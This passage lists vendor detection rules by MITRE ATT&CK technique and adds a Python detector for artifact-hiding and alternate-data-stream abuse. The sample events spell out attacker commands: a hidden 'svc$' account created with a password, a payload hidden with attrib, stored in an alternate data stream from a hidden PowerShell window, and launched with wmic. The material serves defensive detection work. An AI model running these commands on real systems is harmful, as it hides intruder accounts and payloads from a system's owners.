- Sigma Inbox Rules Creation Or Update Activity Via ExchangePowerShell Cmdlet experimental
- Sigma Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet experimental
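The Hide Artifacts rules above draw on three different event sources, and a detection that only watches process creation misses two of them: the SpecialAccounts\UserList and Explorer\Advanced registry writes are Sysmon Event ID 13 (value set), and a payload written into an NTFS alternate data stream is Event ID 15 (named stream created) whether or not anything ever executes it. The Python below is an added example, not any vendor's rule, that evaluates constructed events of all three kinds: hidden users via registry or a `$`-suffixed account name, hidden and system attributes via attrib, hidden PowerShell windows, headless Chromium, and ADS creation, execution and PowerShell -Stream access. The Zone.Identifier exclusion is the caveat every ADS rule needs, since every browser download writes that stream. Field names, predicate names and the sample events are this editor's assumptions.

```python
"""Added example: approximate Hide Artifacts (T1564) predicates over three kinds of
Sysmon-style events: process creation, registry value set (Event ID 13) and named
file stream creation (Event ID 15). This editor's reading of what the rule titles
above describe, not the vendors' rule bodies; the events at the bottom are constructed."""
import ntpath
import re

# drive:\path:stream on a lower-cased line. Quoted paths containing spaces would need a
# real tokenizer and are out of scope here.
ADS_PATH = re.compile(r'\b([a-z]:\\[^\s:"]+):([^\s:"\\]+)')
HIDDEN_USER_CMD = re.compile(r"\bnet1?(?:\.exe)? user (\S+\$) .*/add\b|new-localuser\b.*-name (\S+\$)(?=\s|$)")
BROWSERS = ("chrome.exe", "msedge.exe", "chromium.exe", "brave.exe")

def ads_stream(path):
    """Named stream in a Windows path, or None. ':$DATA' is the default stream and
    Zone.Identifier is the mark-of-the-web every browser download carries, so neither counts."""
    p = path.lower()
    if p.endswith(":$data"):
        p = p[: -len(":$data")]
    m = ADS_PATH.search(p)
    if not m or m.group(2) == "zone.identifier":
        return None
    return m.group(2)

def parse_dword(details):
    """Sysmon renders REG_DWORD values as 'DWORD (0x00000000)'; return the integer or None."""
    m = re.fullmatch(r"dword \((0x[0-9a-f]+)\)", details.strip().lower())
    return int(m.group(1), 16) if m else None

def evaluate_registry(target_object, details):
    t, v, hits = target_object.lower(), parse_dword(details), []
    if "\\winlogon\\specialaccounts\\userlist\\" in t and v == 0:
        hits.append("hidden_user_via_specialaccounts")  # account removed from the logon screen
    if t.endswith("\\explorer\\advanced\\hidden") and v == 2:  # 2 = do not show hidden files
        hits.append("show_hidden_files_disabled")
    if t.endswith("\\explorer\\advanced\\showsuperhidden") and v == 0:
        hits.append("show_hidden_files_disabled")
    return sorted(set(hits))

def evaluate_filestream(target_filename):
    return ["ads_created"] if ads_stream(target_filename) else []

def evaluate_process(image, command_line):
    c = " ".join(command_line.replace('"', "").replace("'", "").split()).lower()
    tokens = c.split()
    prog = ntpath.basename(tokens[0]) if tokens else ""
    hits = []
    if prog in ("attrib", "attrib.exe"):
        flags = {t for t in tokens if t.startswith("+")}
        if "+h" in flags:
            hits.append("hidden_attribute_set")
        if "+s" in flags:
            hits.append("system_attribute_set")
    if HIDDEN_USER_CMD.search(c):
        hits.append("hidden_user_created")  # a '$'-suffixed name mimics a machine account
    for i, tok in enumerate(tokens[:-1]):
        # -WindowStyle may be abbreviated to any unambiguous prefix (-w, -win, ...); 1 == Hidden
        if tok.startswith("-w") and "windowstyle".startswith(tok[1:]) and tokens[i + 1] in ("hidden", "1"):
            hits.append("hidden_window")
    if re.search(r"\b(?:set|add|get)-content\b.*-stream\b", c):
        hits.append("ads_via_powershell_stream")
    if ads_stream(c) or ads_stream(image):
        hits.append("ads_execution")
    if ntpath.basename(image).lower() in BROWSERS and "--headless" in tokens:
        hits.append("headless_browser")
    return sorted(set(hits))

def evaluate(event):
    """Dispatch one event dict on its 'kind' field."""
    if event["kind"] == "registry":
        return evaluate_registry(event["target_object"], event["details"])
    if event["kind"] == "filestream":
        return evaluate_filestream(event["target_filename"])
    return evaluate_process(event["image"], event["command_line"])

SAMPLE_EVENTS = [
    {"kind": "registry", "details": "DWORD (0x00000000)",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\svc$"},
    {"kind": "registry", "details": "DWORD (0x00000002)",
     "target_object": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
    {"kind": "process", "image": r"C:\Windows\System32\net.exe", "command_line": "net user svc$ P@ssw0rd! /add"},
    {"kind": "process", "image": r"C:\Windows\System32\attrib.exe",
     "command_line": r"attrib +s +h C:\Users\Public\payload.exe"},
    {"kind": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -nop -w hidden -c "Set-Content -Path C:\Users\Public\notes.txt -Stream payload -Value AAAA"'},
    {"kind": "process", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r"wmic process call create C:\Users\Public\notes.txt:payload.exe"},
    {"kind": "process", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --dump-dom https://example.invalid'},
    {"kind": "filestream", "target_filename": r"C:\Users\alice\Downloads\setup.exe:Zone.Identifier"},
    {"kind": "filestream", "target_filename": r"C:\Users\Public\notes.txt:payload.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev['kind']:10} -> {evaluate(ev)}")
```

The two file-stream samples show the shape of the false-positive problem: the browser download with its Zone.Identifier stream is ignored, the payload stream under C:\Users\Public fires. The same staged stream then surfaces a second time as ads_execution when wmic launches it, which is the pairing the "Alternate DataStream - Executable Content" and "- Process Execution" rules above are meant to catch together.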
Hijack Execution Flow T1574 183 rules
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service test
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service - PS test
- Sigma APT27 - Emissary Panda Activity test
- Sigma Aruba Network Service Potential DLL Sideloading test
- Sigma Changing Existing Service ImagePath Value Via Reg.EXE test
- Kusto COM Registry Key Modified to Point to File in Color Profile Folder
- Sigma Creation Of Non-Existent System DLL test
- Sigma Creation of WerFault.exe/Wer.dll in Unusual Folder test
- Elastic Deprecated - Adobe Hijack Persistence production
- Elastic Deprecated - Suspicious PrintSpooler Service Executable File Creation production
- Splunk Detect Path Interception By Creation Of program exe production
- Kusto Detect Suspicious Commands Initiated by Webserver Processes available
- Sigma DHCP Callout DLL Installation test
- Sigma DHCP Server Error Failed Loading the CallOut DLL test
- Sigma DHCP Server Loaded the CallOut DLL test
- Sigma Diamond Sleet APT DLL Sideloading Indicators test
- Sigma DLL Execution Via Register-cimprovider.exe test
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL Names Used By SVR For GraphicalProton Backdoor test
- Sigma DLL Search Order Hijackig Via Additional Space in Path test
- Sigma DLL ServerLevelPluginDll command installation experimental
- Sigma DLL ServerLevelPluginDll registration ("serverlevelplugindll" feature abuse) experimental
- Sigma DLL ServerLevelPluginDll registration (Reg via Sysmon) experimental
- Sigma DLL Sideloading by VMware Xfer Utility test
- Sigma DLL Sideloading Of ShellChromeAPI.DLL test
- Sigma DNS Server Error Failed Loading the ServerLevelPluginDLL test
- Sigma Enabling COR Profiler Environment Variables test
- Sigma Exploiting SetupComplete.cmd CVE-2019-1378 test
- Sigma Fax Service DLL Search Order Hijack test
- Splunk GitHub Workflow File Creation or Modification production
- Sigma HackTool - Powerup Write Hijack DLL test
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Kusto Hijack Execution Flow - DLL Side-Loading available
- Splunk iphlpapi.dll File Write to Appdata_Local_Microsoft (Sysmon)
- Sigma Lazarus APT DLL Sideloading Activity test
- Sigma Malicious DLL File Dropped in the Teams or OneDrive Folder test
- Sigma Microsoft Defender Blocked from Loading Unsigned DLL test
- Sigma Microsoft Office DLL Sideload test
- Splunk MSI Module Loaded by Non-System Binary production
- Splunk Msmpeng Application DLL Side Loading production
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Elastic Persistence via Update Orchestrator Service Hijack production
- Sigma Pingback Backdoor Activity test
- Sigma Pingback Backdoor DLL Loading Activity test
- Sigma Pingback Backdoor File Indicators test
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Sigma Possible Privilege Escalation via Weak Service Permissions test
- Sigma Potential 7za.DLL Sideloading test
- Sigma Potential Antivirus Software DLL Sideloading test
- Sigma Potential appverifUI.DLL Sideloading test
- Sigma Potential AVKkid.DLL Sideloading test
- Sigma Potential Azure Browser SSO Abuse test
- Sigma Potential CCleanerDU.DLL Sideloading test
- Sigma Potential CCleanerReactivator.DLL Sideloading test
- Sigma Potential Chrome Frame Helper DLL Sideloading test
- Elastic Potential DLL Side-Loading via Trusted Microsoft Programs production
- Sigma Potential DLL Sideloading Of DBGCORE.DLL test
- Sigma Potential DLL Sideloading Of DBGHELP.DLL test
- Sigma Potential DLL Sideloading Of DbgModel.DLL test
- Sigma Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE test
- Sigma Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE test
- Sigma Potential DLL Sideloading Of MpSvc.DLL test
- Sigma Potential DLL Sideloading Of MsCorSvc.DLL test
- Sigma Potential DLL Sideloading Of Non-Existent DLLs From System Folders test
- Sigma Potential DLL Sideloading Via ClassicExplorer32.dll test
- Sigma Potential DLL Sideloading Via comctl32.dll test
- Sigma Potential DLL Sideloading Via DeviceEnroller.EXE test
- Sigma Potential DLL Sideloading Via JsSchHlp test
- Sigma Potential DLL Sideloading Via VMware Xfer test
- Sigma Potential EACore.DLL Sideloading test
- Sigma Potential Edputil.DLL Sideloading test
- Elastic Potential Exploitation of an Unquoted Service Path Vulnerability production
- Sigma Potential Goopdate.DLL Sideloading test
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Sigma Potential Iviewers.DLL Sideloading test
- Sigma Potential JLI.dll Side-Loading experimental
- Sigma Potential Libvlc.DLL Sideloading test
- Sigma Potential Mfdetours.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading Via Defender Binaries test
- Sigma Potential Notepad++ CVE-2025-49144 Exploitation experimental
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Sigma Potential PlugX Activity test
- Sigma Potential PrintNightmare Exploitation Attempt test
- Elastic Potential Privilege Escalation via InstallerFileTakeOver production
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Privilege Escalation via Service Permissions Weakness test
- Sigma Potential Python DLL SideLoading test
- Sigma Potential Raspberry Robin Aclui Dll SideLoading test
- Sigma Potential Rcdll.DLL Sideloading test
- Sigma Potential Registry Persistence Attempt Via DbgManagedDebugger test
- Sigma Potential RjvPlatform.DLL Sideloading From Default Location test
- Sigma Potential RjvPlatform.DLL Sideloading From Non-Default Location test
- Sigma Potential RoboForm.DLL Sideloading test
- Sigma Potential ShellDispatch.DLL Sideloading test
- Sigma Potential SmadHook.DLL Sideloading test
- Sigma Potential SolidPDFCreator.DLL Sideloading test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Potential System DLL Sideloading From Non System Locations test
- Sigma Potential Vcruntime140 DLL Sideloading experimental
- Sigma Potential Vivaldi_elf.DLL Sideloading test
- Sigma Potential Waveedit.DLL Sideloading test
- Sigma Potential Wazuh Security Platform DLL Sideloading test
- Elastic Potential Windows Session Hijacking via CcmExec production
- Sigma Potential WWlib.DLL Sideloading test
- Sigma Potentially Suspicious Child Process of KeyScrambler.exe test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Windir Environment Variable production
- Splunk Reg exe Manipulating Windows Services Registry Keys production
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Registry-Free Process Scope COR_PROFILER test
- Sigma Regsvr32 DLL Execution With Uncommon Extension test
- Sigma Renamed Vmnat.exe Execution test
- Sigma Service abuse with malicious ImagePath (Reg via command) experimental
- Sigma Service DACL Abuse To Hide Services Via Sc.EXE test
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma Service Registry Key Read Access Request test
- Sigma Service Registry Permissions Weakness Check test
- Sigma Service Security Descriptor Tampering Via Sc.EXE test
- Sigma Setup16.EXE Execution With Custom .Lst File test
- Splunk Shai-Hulud Workflow File Creation or Modification production
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Small Sieve Malware CommandLine Indicator test
- Sigma Spool process spawned a CMD shell (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Sigma Suspicious GUP Usage test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Elastic Suspicious Print Spooler Point and Print DLL production
- Sigma Suspicious Printer Driver Empty Manufacturer test
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet - PS test
- Sigma Suspicious Unsigned Thor Scanner Execution stable
- Sigma System Control Panel Item Loaded From Uncommon Location test
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma Tasks Folder Evasion test
- Sigma Third Party Software DLL Sideloading test
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
- Sigma UAC Bypass With Fake DLL test
- Sigma Unsigned .node File Loaded experimental
- Sigma Unsigned Binary Loaded From Suspicious Location test
- Elastic Unsigned DLL Loaded by a Trusted Process production
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Sigma Unsigned Mfdetours.DLL Sideloading test
- Sigma Unsigned Module Loaded by ClickOnce Application test
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
- Elastic Unusual Persistence via Services Registry production
- Sigma Using SettingSyncHost.exe as LOLBin test
- Sigma VMGuestLib DLL Sideload test
- Sigma VMMap Signed Dbghelp.DLL Potential Sideloading test
- Sigma VMMap Unsigned Dbghelp.DLL Potential Sideloading test
- Splunk Windows BitDefender Submission Wizard DLL Sideloading experimental
- Splunk Windows DLL Search Order Hijacking Hunt with Sysmon production
- Splunk Windows DLL Search Order Hijacking with iscsicpl production
- Splunk Windows DLL Side-Loading In Calc production
- Splunk Windows DLL Side-Loading Process Child Of Calc production
- Splunk Windows Get-Variable.EXE Execution from WindowsApps Folder production
- Splunk Windows Hijack Execution Flow Version Dll Side Load production
- Splunk Windows Known Abused DLL Created production
- Splunk Windows Known Abused DLL Loaded Suspiciously production
- Splunk Windows Known GraphicalProton Loaded Modules production
- Splunk Windows Masquerading Explorer As Child Process production
- Splunk Windows Mock Trusted Directory MSC File Creation production
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows Potential AppDomainManager Hijack Artifacts Creation production
- Splunk Windows PowerShell Module File Created production
- Splunk Windows Rundll32 Execution With Log.DLL production
- Splunk Windows Service Creation Using Registry Entry production
- Splunk Windows Set Custom DNS ServerLevelPlugin Via Dnscmd production
- Sigma Windows Spooler Service Suspicious Binary Load test
- Splunk Windows SqlWriter SQLDumper DLL Sideload production
- Splunk Windows Unsigned DLL Side-Loading production
- Splunk Windows Unsigned DLL Side-Loading In Same Process Path production
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma Winnti Malware HK University Campaign test
- Sigma Winnti Pipemon Characteristics stable
- Elastic WPS Office Exploitation via DLL Hijack production
- Sigma Xwizard.EXE Execution From Non-Default Location test
Hijack Execution Flow: DLL T1574.001 118 rules
- Sigma APT27 - Emissary Panda Activity test
- Sigma Aruba Network Service Potential DLL Sideloading test
- Sigma Creation Of Non-Existent System DLL test
- Sigma Creation of WerFault.exe/Wer.dll in Unusual Folder test
- Elastic Deprecated - Suspicious PrintSpooler Service Executable File Creation production
- Sigma DHCP Callout DLL Installation test
- Sigma DHCP Server Error Failed Loading the CallOut DLL test
- Sigma DHCP Server Loaded the CallOut DLL test
- Sigma Diamond Sleet APT DLL Sideloading Indicators test
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL Names Used By SVR For GraphicalProton Backdoor test
- Sigma DLL Search Order Hijackig Via Additional Space in Path test
- Sigma DLL Sideloading by VMware Xfer Utility test
- Sigma DLL Sideloading Of ShellChromeAPI.DLL test
- Sigma DNS Server Error Failed Loading the ServerLevelPluginDLL test
- Sigma Fax Service DLL Search Order Hijack test
- Sigma HackTool - Powerup Write Hijack DLL test
- Sigma Lazarus APT DLL Sideloading Activity test
- Sigma Malicious DLL File Dropped in the Teams or OneDrive Folder test
- Sigma Microsoft Defender Blocked from Loading Unsigned DLL test
- Sigma Microsoft Office DLL Sideload test
- Splunk MSI Module Loaded by Non-System Binary production
- Splunk Msmpeng Application DLL Side Loading production
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Sigma Pingback Backdoor Activity test
- Sigma Pingback Backdoor DLL Loading Activity test
- Sigma Pingback Backdoor File Indicators test
- Sigma Potential 7za.DLL Sideloading test
- Sigma Potential Antivirus Software DLL Sideloading test
- Sigma Potential appverifUI.DLL Sideloading test
- Sigma Potential AVKkid.DLL Sideloading test
- Sigma Potential Azure Browser SSO Abuse test
- Sigma Potential CCleanerDU.DLL Sideloading test
- Sigma Potential CCleanerReactivator.DLL Sideloading test
- Sigma Potential Chrome Frame Helper DLL Sideloading test
- Elastic Potential DLL Side-Loading via Trusted Microsoft Programs production
- Sigma Potential DLL Sideloading Of DBGCORE.DLL test
- Sigma Potential DLL Sideloading Of DBGHELP.DLL test
- Sigma Potential DLL Sideloading Of DbgModel.DLL test
- Sigma Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE test
- Sigma Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE test
- Sigma Potential DLL Sideloading Of MpSvc.DLL test
- Sigma Potential DLL Sideloading Of MsCorSvc.DLL test
- Sigma Potential DLL Sideloading Of Non-Existent DLLs From System Folders test
- Sigma Potential DLL Sideloading Via ClassicExplorer32.dll test
- Sigma Potential DLL Sideloading Via comctl32.dll test
- Sigma Potential DLL Sideloading Via DeviceEnroller.EXE test
- Sigma Potential DLL Sideloading Via JsSchHlp test
- Sigma Potential DLL Sideloading Via VMware Xfer test
- Sigma Potential EACore.DLL Sideloading test
- Sigma Potential Edputil.DLL Sideloading test
- Sigma Potential Goopdate.DLL Sideloading test
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Sigma Potential Iviewers.DLL Sideloading test
- Sigma Potential JLI.dll Side-Loading experimental
- Sigma Potential Libvlc.DLL Sideloading test
- Sigma Potential Mfdetours.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading test
- Sigma Potential Mpclient.DLL Sideloading Via Defender Binaries test
- Sigma Potential PlugX Activity test
- Sigma Potential Python DLL SideLoading test
- Sigma Potential Raspberry Robin Aclui Dll SideLoading test
- Sigma Potential Rcdll.DLL Sideloading test
- Sigma Potential RjvPlatform.DLL Sideloading From Default Location test
- Sigma Potential RjvPlatform.DLL Sideloading From Non-Default Location test
- Sigma Potential RoboForm.DLL Sideloading test
- Sigma Potential ShellDispatch.DLL Sideloading test
- Sigma Potential SmadHook.DLL Sideloading test
- Sigma Potential SolidPDFCreator.DLL Sideloading test
- Sigma Potential System DLL Sideloading From Non System Locations test
- Sigma Potential Vcruntime140 DLL Sideloading experimental
- Sigma Potential Vivaldi_elf.DLL Sideloading test
- Sigma Potential Waveedit.DLL Sideloading test
- Sigma Potential Wazuh Security Platform DLL Sideloading test
- Elastic Potential Windows Session Hijacking via CcmExec production
- Sigma Potential WWlib.DLL Sideloading test
- Sigma Potentially Suspicious Child Process of KeyScrambler.exe test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Registry Modification for OCI DLL Redirection experimental
- Sigma Renamed Vmnat.exe Execution test
- Sigma Small Sieve Malware CommandLine Indicator test
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Sigma Suspicious GUP Usage test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Sigma Suspicious Unsigned Thor Scanner Execution stable
- Sigma System Control Panel Item Loaded From Uncommon Location test
- Sigma Tasks Folder Evasion test
- Sigma Third Party Software DLL Sideloading test
- Sigma UAC Bypass With Fake DLL test
- Sigma Unsigned .node File Loaded experimental
- Sigma Unsigned Binary Loaded From Suspicious Location test
- Elastic Unsigned DLL Loaded by a Trusted Process production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Sigma Unsigned Mfdetours.DLL Sideloading test
- Sigma Unsigned Module Loaded by ClickOnce Application test
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
- Sigma VMGuestLib DLL Sideload test
- Sigma VMMap Signed Dbghelp.DLL Potential Sideloading test
- Sigma VMMap Unsigned Dbghelp.DLL Potential Sideloading test
- Splunk Windows DLL Search Order Hijacking Hunt with Sysmon production
- Splunk Windows DLL Search Order Hijacking with iscsicpl production
- Splunk Windows DLL Side-Loading In Calc production
- Splunk Windows DLL Side-Loading Process Child Of Calc production
- Splunk Windows Hijack Execution Flow Version Dll Side Load production
- Splunk Windows Known Abused DLL Created production
- Splunk Windows Known Abused DLL Loaded Suspiciously production
- Splunk Windows Known GraphicalProton Loaded Modules production
- Splunk Windows Masquerading Explorer As Child Process production
- Splunk Windows Mustang Panda USB Tool Execution production
- Splunk Windows SqlWriter SQLDumper DLL Sideload production
- Splunk Windows Unsigned DLL Side-Loading production
- Splunk Windows Unsigned DLL Side-Loading In Same Process Path production
- Splunk Windows Unsigned MS DLL Side-Loading production
- Sigma Winnti Malware HK University Campaign test
- Sigma Winnti Pipemon Characteristics stable
- Elastic WPS Office Exploitation via DLL Hijack production
- Sigma Xwizard.EXE Execution From Non-Default Location test
Hijack Execution Flow: DLL Side-Loading T1574.002 10 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma DLL ServerLevelPluginDll command installation experimental
- Sigma DLL ServerLevelPluginDll registration ("serverlevelplugindll" feature abuse) experimental
- Sigma DLL ServerLevelPluginDll registration (Reg via Sysmon) experimental
- Kusto Hijack Execution Flow - DLL Side-Loading available
- Splunk iphlpapi.dll File Write to Appdata_Local_Microsoft (Sysmon)
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Sigma Spool process spawned a CMD shell (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
Hijack Execution Flow: Dylib Hijacking T1574.004 1 rule
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Hijack Execution Flow: Executable Installer File Permissions Weakness T1574.005 2 rules
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Sigma Setup16.EXE Execution With Custom .Lst File test
Hijack Execution Flow: Dynamic Linker Hijacking T1574.006 2 rules
- Splunk GitHub Workflow File Creation or Modification production
- Splunk Shai-Hulud Workflow File Creation or Modification production
Hijack Execution Flow: Path Interception by PATH Environment Variable T1574.007 5 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma Potential Suspicious Activity Using SeCEdit test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Windir Environment Variable production
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
Hijack Execution Flow: Path Interception by Search Order Hijacking T1574.008 6 rules
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Sigma Potential Notepad++ CVE-2025-49144 Exploitation experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Using SettingSyncHost.exe as LOLBin test
- Splunk Windows Get-Variable.EXE Execution from WindowsApps Folder production
Hijack Execution Flow: Path Interception by Unquoted Path T1574.009 4 rules
- Splunk Detect Path Interception By Creation Of program exe production
- Kusto DLL Hijacking: Loading from an Unusual Directory
- Elastic Potential Exploitation of an Unquoted Service Path Vulnerability production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
Hijack Execution Flow: Services File Permissions Weakness T1574.010 6 rules
- Elastic Deprecated - Adobe Hijack Persistence production
- Sigma Service abuse with malicious ImagePath (Reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
Hijack Execution Flow: Services Registry Permissions Weakness T1574.011 17 rules
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service test
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service - PS test
- Sigma Changing Existing Service ImagePath Value Via Reg.EXE test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Sigma Possible Privilege Escalation via Weak Service Permissions test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Privilege Escalation via Service Permissions Weakness test
- Splunk Reg exe Manipulating Windows Services Registry Keys production
- Sigma Service DACL Abuse To Hide Services Via Sc.EXE test
- Sigma Service Registry Key Read Access Request test
- Sigma Service Registry Permissions Weakness Check test
- Sigma Service Security Descriptor Tampering Via Sc.EXE test
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet - PS test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Splunk Windows Service Creation Using Registry Entry production
Hijack Execution Flow: COR_PROFILER T1574.012 2 rules
- Sigma Enabling COR Profiler Environment Variables test
- Sigma Registry-Free Process Scope COR_PROFILER test
Hijack Execution Flow: AppDomainManager T1574.014 1 rule
- Splunk Windows Potential AppDomainManager Hijack Artifacts Creation production
Reflective Code Loading T1620 4 rules
- Sigma Potential In-Memory Execution Using Reflection.Assembly test
- Sigma PowerShell Base64 Encoded Reflective Assembly Load test
- Splunk PowerShell PInvoke Process Injection API Chain production
- Splunk Windows MMC Loaded Script Engine DLL production
Debugger Evasion T1622 1 rule
- Sigma PUA - Process Hacker Execution test
Defense Impairment
Modify Registry T1112 251 rules
- Sigma Activate Suppression of Windows Security Center Notifications test
- Sigma Add DisallowRun Execution to Registry test
- Sigma Allow RDP Remote Assistance Feature test
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Sigma Blackbyte Ransomware Registry test
- YARA-L Blackbyte Ransomware Registry
- Sigma Blue Mockingbird test
- Sigma Blue Mockingbird - Registry test
- Sigma Change the Fax Dll test
- Sigma Change User Account Associated with the FAX Service test
- Sigma ClickOnce Trust Prompt Tampering test
- Elastic Code Signing Policy Modification Through Registry production
- Elastic Component Object Model Hijacking production
- Sigma CrashControl CrashDump Disabled test
- Sigma CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry test
- Splunk Defender Registry Values Modified (Sysmon)
- Splunk Defender Registry Values Modified (Windows Event Log)
- Elastic Deprecated - Encoded Executable Stored in the Registry production
- Kusto Detect Registry Run Key Creation/Modification available
- Sigma DHCP Callout DLL Installation test
- Sigma Disable Internal Tools or Feature in Registry test
- YARA-L Disable Internal Tools or Feature in Registry
- Splunk Disable Registry Tool production
- Sigma Disable Security Events Logging Adding Reg Key MiniNt test
- Splunk Disable Security Logs Using MiniNt Registry production
- Splunk Disable Show Hidden Files production
- Splunk Disable Windows App Hotkeys production
- Sigma Disable Windows Security Center Notifications test
- Splunk Disabling CMD Application production
- Splunk Disabling ControlPanel production
- Elastic Disabling Lsa Protection via Registry Modification production
- Splunk Disabling NoRun Windows App production
- Elastic Disabling User Account Control via Registry Modification production
- Elastic DNS Global Query Block List Modified or Disabled production
- Sigma DNS-over-HTTPS Enabled by Registry test
- Elastic DNS-over-HTTPS Enabled via Registry production
- Sigma Enable LM Hash Storage test
- Sigma Enable LM Hash Storage - ProcCreation test
- Splunk Enable WDigest UseLogonCredential Registry production
- Sigma ETW Logging Disabled For rpcrt4.dll test
- Sigma ETW Logging Disabled For SCM test
- Sigma ETW Logging Disabled In .NET Processes - Registry test
- Sigma ETW Logging Disabled In .NET Processes - Sysmon Registry test
- Elastic File or Directory Deletion Command production
- Sigma FlowCloud Registry Markers test
- Splunk FodHelper UAC Bypass production
- Elastic Full User-Mode Dumps Enabled System-Wide production
- Splunk HTTP_HTTPS Default Security Zone Modified to Local Machine (PowerShell)
- Splunk HTTP_HTTPS Default Security Zone Modified to Local Machine (Windows Event Log)
- Elastic Image File Execution Options Injection production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Sigma Imports Registry Key From a File test
- Sigma Imports Registry Key From an ADS test
- Elastic Installation of Security Support Provider production
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (PowerShell)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Sysmon)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Windows Event Log)
- Sigma Macro Enabled In A Potentially Suspicious Document test
- Splunk Malicious InProcServer32 Modification production
- Sigma Microsoft Office Trusted Location Updated test
- Elastic Microsoft Windows Defender Tampering production
- Elastic Modification of AmsiEnable Registry Key production
- Sigma Modification of IE Registry Settings test
- Elastic Modification of WDigest Security Provider production
- Splunk Modify Registry Key (Windows Event Log)
- Elastic MS Office Macro Security Registry Modifications production
